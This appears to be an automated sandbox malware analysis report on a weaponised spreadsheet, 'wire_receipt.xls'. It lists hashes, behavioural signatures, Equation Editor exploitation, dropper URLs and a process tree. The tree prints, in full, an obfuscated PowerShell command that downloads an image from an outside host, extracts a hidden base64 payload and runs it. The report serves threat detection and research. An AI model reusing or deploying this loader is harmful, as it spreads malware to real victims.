f30ecca55c1a5c272f1cdf82b8f3dbb18689a689a98fe77d3f50ab249665ab07

Analysis

max time kernel
144s
max time network
127s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
22/08/2024, 05:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wire_receipt.xls
Size

449KB
MD5

83ee185562ee68924b96e955fae0288c
SHA1

2651e918e6ea1aa228cdf0b4d2bcbda43c491c81
SHA256

f30ecca55c1a5c272f1cdf82b8f3dbb18689a689a98fe77d3f50ab249665ab07
SHA512

fbc1c10cf53926f766259c954d8bafa0ba25fb1df6f81fa268c4dd9935c7fb7564fa2c252f62efba8fb6ef014cc162d5cb4793c29d5b2d9e9f8d48b4907fe3bd
SSDEEP

12288:OnEGJFAYHW6b5wUyAeor7r6DFfWaS3i4cdFIZhp/4:zKh5xeC6DF/S3i4cfIZ

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
16	1732	EQNEDT32.EXE
18	1044	powershell.exe
19	1044	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1044	powershell.exe
2176	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Office\Common\Offline\Files\https://jamp.to/QSsf4p	WINWORD.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1732	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2652	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2176	powershell.exe
1044	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeShutdownPrivilege	2564	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2652	EXCEL.EXE
2652	EXCEL.EXE
2652	EXCEL.EXE
2564	WINWORD.EXE
2564	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 1988	1732	EQNEDT32.EXE	33
PID 1732 wrote to memory of 1988	1732	EQNEDT32.EXE	33
PID 1732 wrote to memory of 1988	1732	EQNEDT32.EXE	33
PID 1732 wrote to memory of 1988	1732	EQNEDT32.EXE	33
PID 2564 wrote to memory of 2228	2564	WINWORD.EXE	35
PID 2564 wrote to memory of 2228	2564	WINWORD.EXE	35
PID 2564 wrote to memory of 2228	2564	WINWORD.EXE	35
PID 2564 wrote to memory of 2228	2564	WINWORD.EXE	35
PID 1988 wrote to memory of 2176	1988	WScript.exe	34
PID 1988 wrote to memory of 2176	1988	WScript.exe	34
PID 1988 wrote to memory of 2176	1988	WScript.exe	34
PID 1988 wrote to memory of 2176	1988	WScript.exe	34
PID 2176 wrote to memory of 1044	2176	powershell.exe	37
PID 2176 wrote to memory of 1044	2176	powershell.exe	37
PID 2176 wrote to memory of 1044	2176	powershell.exe	37
PID 2176 wrote to memory of 1044	2176	powershell.exe	37

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\wire_receipt.xls
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2652

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2228

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\creatednewbuttersmoothbuno.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J┗ ䷡ ⽨ ▝ ⇫Bp┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫YQBn┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫VQBy┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫9┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫JwBo┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bw┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫Og┗ ䷡ ⽨ ▝ ⇫v┗ ䷡ ⽨ ▝ ⇫C8┗ ䷡ ⽨ ▝ ⇫aQBh┗ ䷡ ⽨ ▝ ⇫Dg┗ ䷡ ⽨ ▝ ⇫M┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫z┗ ䷡ ⽨ ▝ ⇫DE┗ ䷡ ⽨ ▝ ⇫M┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫0┗ ䷡ ⽨ ▝ ⇫C4┗ ䷡ ⽨ ▝ ⇫dQBz┗ ䷡ ⽨ ▝ ⇫C4┗ ䷡ ⽨ ▝ ⇫YQBy┗ ䷡ ⽨ ▝ ⇫GM┗ ䷡ ⽨ ▝ ⇫a┗ ䷡ ⽨ ▝ ⇫Bp┗ ䷡ ⽨ ▝ ⇫HY┗ ䷡ ⽨ ▝ ⇫ZQ┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫G8┗ ䷡ ⽨ ▝ ⇫cgBn┗ ䷡ ⽨ ▝ ⇫C8┗ ䷡ ⽨ ▝ ⇫Mg┗ ䷡ ⽨ ▝ ⇫3┗ ䷡ ⽨ ▝ ⇫C8┗ ䷡ ⽨ ▝ ⇫aQB0┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫bQBz┗ ䷡ ⽨ ▝ ⇫C8┗ ䷡ ⽨ ▝ ⇫dgBi┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫Xw┗ ䷡ ⽨ ▝ ⇫y┗ ䷡ ⽨ ▝ ⇫D┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫Mg┗ ䷡ ⽨ ▝ ⇫0┗ ䷡ ⽨ ▝ ⇫D┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫Nw┗ ䷡ ⽨ ▝ ⇫y┗ ䷡ ⽨ ▝ ⇫DY┗ ䷡ ⽨ ▝ ⇫Xw┗ ䷡ ⽨ ▝ ⇫y┗ ䷡ ⽨ ▝ ⇫D┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫Mg┗ ䷡ ⽨ ▝ ⇫0┗ ䷡ ⽨ ▝ ⇫D┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫Nw┗ ䷡ ⽨ ▝ ⇫y┗ ䷡ ⽨ ▝ ⇫DY┗ ䷡ ⽨ ▝ ⇫LwB2┗ ䷡ ⽨ ▝ ⇫GI┗ ䷡ ⽨ ▝ ⇫cw┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫Go┗ ䷡ ⽨ ▝ ⇫c┗ ䷡ ⽨ ▝ ⇫Bn┗ ䷡ ⽨ ▝ ⇫Cc┗ ䷡ ⽨ ▝ ⇫Ow┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫Hc┗ ䷡ ⽨ ▝ ⇫ZQBi┗ ䷡ ⽨ ▝ ⇫EM┗ ䷡ ⽨ ▝ ⇫b┗ ䷡ ⽨ ▝ ⇫Bp┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫bgB0┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫PQ┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫E4┗ ䷡ ⽨ ▝ ⇫ZQB3┗ ䷡ ⽨ ▝ ⇫C0┗ ䷡ ⽨ ▝ ⇫TwBi┗ ䷡ ⽨ ▝ ⇫Go┗ ䷡ ⽨ ▝ ⇫ZQBj┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫BT┗ ䷡ ⽨ ▝ ⇫Hk┗ ䷡ ⽨ ▝ ⇫cwB0┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫bQ┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫E4┗ ䷡ ⽨ ▝ ⇫ZQB0┗ ䷡ ⽨ ▝ ⇫C4┗ ䷡ ⽨ ▝ ⇫VwBl┗ ䷡ ⽨ ▝ ⇫GI┗ ䷡ ⽨ ▝ ⇫QwBs┗ ䷡ ⽨ ▝ ⇫Gk┗ ䷡ ⽨ ▝ ⇫ZQBu┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫Ow┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫Gk┗ ䷡ ⽨ ▝ ⇫bQBh┗ ䷡ ⽨ ▝ ⇫Gc┗ ䷡ ⽨ ▝ ⇫ZQBC┗ ䷡ ⽨ ▝ ⇫Hk┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫9┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫J┗ ䷡ ⽨ ▝ ⇫B3┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫YgBD┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫aQBl┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫EQ┗ ䷡ ⽨ ▝ ⇫bwB3┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫b┗ ䷡ ⽨ ▝ ⇫Bv┗ ䷡ ⽨ ▝ ⇫GE┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫BE┗ ䷡ ⽨ ▝ ⇫GE┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bh┗ ䷡ ⽨ ▝ ⇫Cg┗ ䷡ ⽨ ▝ ⇫J┗ ䷡ ⽨ ▝ ⇫Bp┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫YQBn┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫VQBy┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫KQ┗ ䷡ ⽨ ▝ ⇫7┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫aQBt┗ ䷡ ⽨ ▝ ⇫GE┗ ䷡ ⽨ ▝ ⇫ZwBl┗ ䷡ ⽨ ▝ ⇫FQ┗ ䷡ ⽨ ▝ ⇫ZQB4┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫9┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫WwBT┗ ䷡ ⽨ ▝ ⇫Hk┗ ䷡ ⽨ ▝ ⇫cwB0┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫bQ┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫FQ┗ ䷡ ⽨ ▝ ⇫ZQB4┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫LgBF┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫YwBv┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫aQBu┗ ䷡ ⽨ ▝ ⇫Gc┗ ䷡ ⽨ ▝ ⇫XQ┗ ䷡ ⽨ ▝ ⇫6┗ ䷡ ⽨ ▝ ⇫Do┗ ䷡ ⽨ ▝ ⇫VQBU┗ ䷡ ⽨ ▝ ⇫EY┗ ䷡ ⽨ ▝ ⇫O┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫Ec┗ ䷡ ⽨ ▝ ⇫ZQB0┗ ䷡ ⽨ ▝ ⇫FM┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫By┗ ䷡ ⽨ ▝ ⇫Gk┗ ䷡ ⽨ ▝ ⇫bgBn┗ ䷡ ⽨ ▝ ⇫Cg┗ ䷡ ⽨ ▝ ⇫J┗ ䷡ ⽨ ▝ ⇫Bp┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫YQBn┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫QgB5┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫ZQBz┗ ䷡ ⽨ ▝ ⇫Ck┗ ䷡ ⽨ ▝ ⇫Ow┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bh┗ ䷡ ⽨ ▝ ⇫HI┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫BG┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫YQBn┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫PQ┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫Cc┗ ䷡ ⽨ ▝ ⇫P┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫8┗ ䷡ ⽨ ▝ ⇫EI┗ ䷡ ⽨ ▝ ⇫QQBT┗ ䷡ ⽨ ▝ ⇫EU┗ ䷡ ⽨ ▝ ⇫Ng┗ ䷡ ⽨ ▝ ⇫0┗ ䷡ ⽨ ▝ ⇫F8┗ ䷡ ⽨ ▝ ⇫UwBU┗ ䷡ ⽨ ▝ ⇫EE┗ ䷡ ⽨ ▝ ⇫UgBU┗ ䷡ ⽨ ▝ ⇫D4┗ ䷡ ⽨ ▝ ⇫Pg┗ ䷡ ⽨ ▝ ⇫n┗ ䷡ ⽨ ▝ ⇫Ds┗ ䷡ ⽨ ▝ ⇫J┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫BG┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫YQBn┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫PQ┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫Cc┗ ䷡ ⽨ ▝ ⇫P┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫8┗ ䷡ ⽨ ▝ ⇫EI┗ ䷡ ⽨ ▝ ⇫QQBT┗ ䷡ ⽨ ▝ ⇫EU┗ ䷡ ⽨ ▝ ⇫Ng┗ ䷡ ⽨ ▝ ⇫0┗ ䷡ ⽨ ▝ ⇫F8┗ ䷡ ⽨ ▝ ⇫RQBO┗ ䷡ ⽨ ▝ ⇫EQ┗ ䷡ ⽨ ▝ ⇫Pg┗ ䷡ ⽨ ▝ ⇫+┗ ䷡ ⽨ ▝ ⇫Cc┗ ䷡ ⽨ ▝ ⇫Ow┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bh┗ ䷡ ⽨ ▝ ⇫HI┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫BJ┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫Hg┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫9┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫J┗ ䷡ ⽨ ▝ ⇫Bp┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫YQBn┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫V┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫Hg┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫Ek┗ ䷡ ⽨ ▝ ⇫bgBk┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫e┗ ䷡ ⽨ ▝ ⇫BP┗ ䷡ ⽨ ▝ ⇫GY┗ ䷡ ⽨ ▝ ⇫K┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bh┗ ䷡ ⽨ ▝ ⇫HI┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫BG┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫YQBn┗ ䷡ ⽨ ▝ ⇫Ck┗ ䷡ ⽨ ▝ ⇫Ow┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫bgBk┗ ䷡ ⽨ ▝ ⇫Ek┗ ䷡ ⽨ ▝ ⇫bgBk┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫e┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫D0┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫Gk┗ ䷡ ⽨ ▝ ⇫bQBh┗ ䷡ ⽨ ▝ ⇫Gc┗ ䷡ ⽨ ▝ ⇫ZQBU┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫e┗ ䷡ ⽨ ▝ ⇫B0┗ ䷡ ⽨ ▝ ⇫C4┗ ䷡ ⽨ ▝ ⇫SQBu┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫ZQB4┗ ䷡ ⽨ ▝ ⇫E8┗ ䷡ ⽨ ▝ ⇫Zg┗ ䷡ ⽨ ▝ ⇫o┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫ZQBu┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫RgBs┗ ䷡ ⽨ ▝ ⇫GE┗ ䷡ ⽨ ▝ ⇫Zw┗ ䷡ ⽨ ▝ ⇫p┗ ䷡ ⽨ ▝ ⇫Ds┗ ䷡ ⽨ ▝ ⇫J┗ ䷡ ⽨ ▝ ⇫Bz┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫YQBy┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫SQBu┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫ZQB4┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫LQBn┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫w┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫LQBh┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫ZQBu┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫SQBu┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫ZQB4┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫LQBn┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bh┗ ䷡ ⽨ ▝ ⇫HI┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫BJ┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫Hg┗ ䷡ ⽨ ▝ ⇫Ow┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bh┗ ䷡ ⽨ ▝ ⇫HI┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫BJ┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫Hg┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫r┗ ䷡ ⽨ ▝ ⇫D0┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bh┗ ䷡ ⽨ ▝ ⇫HI┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫BG┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫YQBn┗ ䷡ ⽨ ▝ ⇫C4┗ ䷡ ⽨ ▝ ⇫T┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫ZwB0┗ ䷡ ⽨ ▝ ⇫Gg┗ ䷡ ⽨ ▝ ⇫Ow┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫GI┗ ䷡ ⽨ ▝ ⇫YQBz┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫Ng┗ ䷡ ⽨ ▝ ⇫0┗ ䷡ ⽨ ▝ ⇫Ew┗ ䷡ ⽨ ▝ ⇫ZQBu┗ ䷡ ⽨ ▝ ⇫Gc┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bo┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫PQ┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫ZQBu┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫SQBu┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫ZQB4┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫LQ┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫cwB0┗ ䷡ ⽨ ▝ ⇫GE┗ ䷡ ⽨ ▝ ⇫cgB0┗ ䷡ ⽨ ▝ ⇫Ek┗ ䷡ ⽨ ▝ ⇫bgBk┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫e┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫7┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫YgBh┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫ZQ┗ ䷡ ⽨ ▝ ⇫2┗ ䷡ ⽨ ▝ ⇫DQ┗ ䷡ ⽨ ▝ ⇫QwBv┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫bQBh┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫D0┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫Gk┗ ䷡ ⽨ ▝ ⇫bQBh┗ ䷡ ⽨ ▝ ⇫Gc┗ ䷡ ⽨ ▝ ⇫ZQBU┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫e┗ ䷡ ⽨ ▝ ⇫B0┗ ䷡ ⽨ ▝ ⇫C4┗ ䷡ ⽨ ▝ ⇫UwB1┗ ䷡ ⽨ ▝ ⇫GI┗ ䷡ ⽨ ▝ ⇫cwB0┗ ䷡ ⽨ ▝ 